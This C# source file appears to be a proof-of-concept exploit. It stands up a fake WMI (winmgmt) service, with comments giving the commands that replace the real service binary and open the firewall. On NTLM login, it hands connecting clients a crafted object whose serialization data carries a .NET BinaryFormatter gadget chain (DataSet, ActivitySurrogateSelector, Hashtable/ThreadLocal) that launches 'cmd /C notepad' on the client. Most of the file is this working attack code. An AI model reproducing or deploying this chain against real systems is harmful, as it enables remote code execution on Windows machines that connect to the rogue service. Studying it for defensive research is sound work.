﻿using System;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Threading;
using System.Windows.Forms;

namespace FakeWMIService
{
    /*
     * New-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Inbound -Program C:\service\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any
     * New-NetFirewallRule -DisplayName FAKEWMI -Enabled True -Profile Any -Direction Outbound -Program C:\service\FakeWMIService.exe -Protocol Tcp -LocalPort Any -RemotePort Any -LocalAddress Any -RemoteAddress Any
     * sc.exe config winmgmt binPath= c:\service\FakeWMIService.exe type= own
     * Restart-Service winmgmt -Force
     */

    [ComVisible(true), InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("44aca674-e8fc-11d0-a07c-00c04fb68820")]
    public interface IWbemContext
    {
    }

    [ComVisible(true), InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("d4781cd6-e5d3-44df-ad94-930efe48a887")]
    public interface IWbemLoginClientID
    {
        void SetClientInfo(
            [MarshalAs(UnmanagedType.LPWStr)] string wszClientMachine,
            int lClientProcId,
            int lReserved
        );
    }

    [ComVisible(true), InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("9556dc99-828c-11cf-a37e-00aa003240c7")]
    public interface IWbemServices
    {
        void OpenNamespace(
            [MarshalAs(UnmanagedType.BStr)] string strNamespace,

            int lFlags,

            IWbemContext pCtx,

            out IWbemServices ppWorkingNamespace,

            out IntPtr ppResult
     );

        void CancelAsyncCall(
            IntPtr pSink
        );

        void QueryObjectSink(
            int lFlags,
            out IntPtr ppResponseHandler
        );

        void GetObject(
            IntPtr strObjectPath,
            int lFlags,
            IntPtr pCtx,
            out IntPtr ppObject,
            out IntPtr ppCallResult
        );

        void GetObjectAsync(
            IntPtr strObjectPath,

            int lFlags,

            IntPtr pCtx,

            IntPtr pResponseHandler
     );

        void PutClass(
            IntPtr pObject,
            int lFlags,
            IntPtr pCtx,
            out IntPtr ppCallResult
        );

        void PutClassAsync(
            IntPtr pObject,
            int lFlags,
            IntPtr pCtx,
            IntPtr pResponseHandler
        );

        void DeleteClass(
            IntPtr strClass,

            int lFlags,

            IntPtr pCtx,

            out IntPtr ppCallResult
     );

        void DeleteClassAsync(
            IntPtr strClass,

            int lFlags,

            IntPtr pCtx,

            IntPtr pResponseHandler
     );

        void CreateClassEnum(
            IntPtr strSuperclass,

            int lFlags,

            IntPtr pCtx,

            out IntPtr ppEnum
     );

        void CreateClassEnumAsync(
            IntPtr strSuperclass,

            int lFlags,

            IntPtr pCtx,

            IntPtr pResponseHandler
     );

        void PutInstance(
            IntPtr pInst,
            int lFlags,
            IntPtr pCtx,
            out IntPtr ppCallResult
        );

        void PutInstanceAsync(
            IntPtr pInst,
            int lFlags,
            IntPtr pCtx,
            IntPtr pResponseHandler
        );

        void DeleteInstance(
            IntPtr strObjectPath,

            int lFlags,

            IntPtr pCtx,

            out IntPtr ppCallResult
     );

        void DeleteInstanceAsync(
            IntPtr strObjectPath,

            int lFlags,

            IntPtr pCtx,

            IntPtr pResponseHandler
     );

        void CreateInstanceEnum(
            IntPtr strSuperClass,

            int lFlags,

            IntPtr pCtx,

            out IntPtr ppEnum
     );

        void CreateInstanceEnumAsync(
            IntPtr strSuperClass,

            int lFlags,

            IntPtr pCtx,
            IntPtr pResponseHandler
     );

        void ExecQuery(
            IntPtr strQueryLanguage,
            IntPtr strQuery,
            int lFlags,
            IntPtr pCtx,
            out IntPtr ppEnum
     );

        void ExecQueryAsync(
            IntPtr strQueryLanguage,
            IntPtr strQuery,
            int lFlags,
            IntPtr pCtx,
            IntPtr pResponseHandler
     );

        void ExecNotificationQuery(
            IntPtr strQueryLanguage,

            IntPtr strQuery,

            int lFlags,

            IntPtr pCtx,

            out IntPtr ppEnum
     );

        void ExecNotificationQueryAsync(
            IntPtr strQueryLanguage,

            IntPtr strQuery,

            int lFlags,

            IntPtr pCtx,

            IntPtr pResponseHandler
     );

        void ExecMethod(
            IntPtr strObjectPath,

            IntPtr strMethodName,

            int lFlags,

            IntPtr pCtx,

            IntPtr pInParams,

            out IntPtr ppOutParams,

            out IntPtr ppCallResult
     );

        void ExecMethodAsync(
            IntPtr strObjectPath,

            IntPtr strMethodName,

            int lFlags,

            IntPtr pCtx,

            IntPtr pInParams,

            IntPtr pResponseHandler
     );
    }

    [ComVisible(true), InterfaceType(ComInterfaceType.InterfaceIsIUnknown), Guid("F309AD18-D86A-11d0-A075-00C04FB68820")]
    public interface IWbemLevel1Login
    {
        void EstablishPosition(
            IntPtr reserved1,

            int reserved2,
            out int LocaleVersion
        );

        void RequestChallenge(
            IntPtr reserved1,
            IntPtr reserved2,
            /*[out, size_is(16), length_is(16)]*/ IntPtr reserved3
        );

        void WBEMLogin(
            IntPtr reserved1,

            /*[in, size_is(16), length_is(16), unique] */
            IntPtr reserved2,
            int reserved3,
            IWbemContext reserved4,
            out IWbemServices reserved5
        );

        void NTLMLogin(
            [MarshalAs(UnmanagedType.LPWStr)] string wszNetworkResource,
            [MarshalAs(UnmanagedType.LPWStr)] string wszPreferredLocale,
            int lFlags,
            IWbemContext pCtx,
            out IWbemServices ppNamespace
        );

    }

    class MySurrogateSelector : SurrogateSelector
    {
        public override ISerializationSurrogate GetSurrogate(Type type, StreamingContext context, out ISurrogateSelector selector)
        {
            selector = this;
            if (!type.IsSerializable)
            {
                Type t = Type.GetType("System.Workflow.ComponentModel.Serialization.ActivitySurrogateSelector+ObjectSurrogate, System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
                return (ISerializationSurrogate)Activator.CreateInstance(t);
            }

            return base.GetSurrogate(type, context, out selector);
        }

    }

    [Serializable, ComVisible(true)]
    public class FakeWbemServices : IWbemServices, ISerializable
    {
        public void CancelAsyncCall(IntPtr pSink)
        {
            throw new NotImplementedException();
        }

        public void CreateClassEnum(IntPtr strSuperclass, int lFlags, IntPtr pCtx, out IntPtr ppEnum)
        {
            throw new NotImplementedException();
        }

        public void CreateClassEnumAsync(IntPtr strSuperclass, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void CreateInstanceEnum(IntPtr strSuperClass, int lFlags, IntPtr pCtx, out IntPtr ppEnum)
        {
            throw new NotImplementedException();
        }

        public void CreateInstanceEnumAsync(IntPtr strSuperClass, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void DeleteClass(IntPtr strClass, int lFlags, IntPtr pCtx, out IntPtr ppCallResult)
        {
            throw new NotImplementedException();
        }

        public void DeleteClassAsync(IntPtr strClass, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void DeleteInstance(IntPtr strObjectPath, int lFlags, IntPtr pCtx, out IntPtr ppCallResult)
        {
            throw new NotImplementedException();
        }

        public void DeleteInstanceAsync(IntPtr strObjectPath, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void ExecMethod(IntPtr strObjectPath, IntPtr strMethodName, int lFlags, IntPtr pCtx, IntPtr pInParams, out IntPtr ppOutParams, out IntPtr ppCallResult)
        {
            throw new NotImplementedException();
        }

        public void ExecMethodAsync(IntPtr strObjectPath, IntPtr strMethodName, int lFlags, IntPtr pCtx, IntPtr pInParams, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void ExecNotificationQuery(IntPtr strQueryLanguage, IntPtr strQuery, int lFlags, IntPtr pCtx, out IntPtr ppEnum)
        {
            throw new NotImplementedException();
        }

        public void ExecNotificationQueryAsync(IntPtr strQueryLanguage, IntPtr strQuery, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void ExecQuery(IntPtr strQueryLanguage, IntPtr strQuery, int lFlags, IntPtr pCtx, out IntPtr ppEnum)
        {
            throw new NotImplementedException();
        }

        public void ExecQueryAsync(IntPtr strQueryLanguage, IntPtr strQuery, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void GetObject(IntPtr strObjectPath, int lFlags, IntPtr pCtx, out IntPtr ppObject, out IntPtr ppCallResult)
        {
            throw new NotImplementedException();
        }

        public void GetObjectAsync(IntPtr strObjectPath, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void GetObjectData(SerializationInfo info, StreamingContext context)
        {
            System.Diagnostics.Trace.WriteLine("In GetObjectData");

            ProcessStartInfo start_info = new ProcessStartInfo("cmd", "/C notepad");
            Process p = new Process();
            p.StartInfo = start_info;
            Func<bool> f = p.Start;
            ThreadLocal<bool> tl = new ThreadLocal<bool>(f, false);

            List<object> ls = new List<object>();
            ls.Add(p);
            ls.Add(start_info);
            ls.Add(tl);

            System.Collections.IComparer cc = new KeysConverter();
            System.Collections.Hashtable ht = new System.Collections.Hashtable();

            ht.Add(tl, "Hello");
            ht.Add("Dummy", "Hello2");

            FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
            Array keys = (Array)fi_keys.GetValue(ht);
            FieldInfo fi_key = keys.GetType().GetElementType().GetField("key", BindingFlags.Public | BindingFlags.Instance);
            for (int i = 0; i < keys.Length; ++i)
            {
                object bucket = keys.GetValue(i);
                object key = fi_key.GetValue(bucket);
                if (key is string)
                {
                    fi_key.SetValue(bucket, tl);
                    keys.SetValue(bucket, i);
                    break;
                }
            }

            fi_keys.SetValue(ht, keys);
            ls.Add(ht);

            info.SetType(typeof(System.Data.DataSet));
            info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
            info.AddValue("DataSet.DataSetName", "");
            info.AddValue("DataSet.Namespace", "");
            info.AddValue("DataSet.Prefix", "");
            info.AddValue("DataSet.CaseSensitive", false);
            info.AddValue("DataSet.LocaleLCID", 0x409);
            info.AddValue("DataSet.EnforceConstraints", false);
            info.AddValue("DataSet.ExtendedProperties", (PropertyCollection)null);
            info.AddValue("DataSet.Tables.Count", 1);
            BinaryFormatter fmt = new BinaryFormatter();
            MemoryStream stm = new MemoryStream();
            fmt.SurrogateSelector = new MySurrogateSelector();
            fmt.Serialize(stm, ls);
            info.AddValue("DataSet.Tables_0", stm.ToArray());
        }

        public void OpenNamespace([MarshalAs(UnmanagedType.BStr)] string strNamespace, int lFlags, IWbemContext pCtx, out IWbemServices ppWorkingNamespace, out IntPtr ppResult)
        {
            throw new NotImplementedException();
        }

        public void PutClass(IntPtr pObject, int lFlags, IntPtr pCtx, out IntPtr ppCallResult)
        {
            throw new NotImplementedException();
        }

        public void PutClassAsync(IntPtr pObject, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void PutInstance(IntPtr pInst, int lFlags, IntPtr pCtx, out IntPtr ppCallResult)
        {
            throw new NotImplementedException();
        }

        public void PutInstanceAsync(IntPtr pInst, int lFlags, IntPtr pCtx, IntPtr pResponseHandler)
        {
            throw new NotImplementedException();
        }

        public void QueryObjectSink(int lFlags, out IntPtr ppResponseHandler)
        {
            throw new NotImplementedException();
        }
    }

    [ComVisible(true), Guid("8BC3F05E-D86B-11D0-A075-00C04FB68820")]
    public class FakeWmiServer : IWbemLevel1Login, IWbemLoginClientID
    {
        public FakeWmiServer()
        {
            System.Diagnostics.Trace.WriteLine("In FakeWmiServer");
        }

        public void EstablishPosition(IntPtr reserved1, int reserved2, out int LocaleVersion)
        {
            System.Diagnostics.Trace.WriteLine("In EstablishPosition");
            throw new NotImplementedException();
        }

        public void NTLMLogin([MarshalAs(UnmanagedType.LPWStr)] string wszNetworkResource, [MarshalAs(UnmanagedType.LPWStr)] string wszPreferredLocale, 
            int lFlags, IWbemContext pCtx, out IWbemServices ppNamespace)
        {
            System.Diagnostics.Trace.WriteLine("In NTLMLogin");
            ppNamespace = new FakeWbemServices();
        }

        public void RequestChallenge(IntPtr reserved1, IntPtr reserved2, IntPtr reserved3)
        {
            System.Diagnostics.Trace.WriteLine("In RequestChallenge");
            throw new NotImplementedException();
        }

        public void SetClientInfo([MarshalAs(UnmanagedType.LPWStr)] string wszClientMachine, int lClientProcId, int lReserved)
        {
            System.Diagnostics.Trace.WriteLine("In SetClientInfo");
        }

        public void WBEMLogin(IntPtr reserved1, IntPtr reserved2, int reserved3, IWbemContext reserved4, out IWbemServices reserved5)
        {
            System.Diagnostics.Trace.WriteLine("In WBEMLogin");
            throw new NotImplementedException();
        }
    }
}
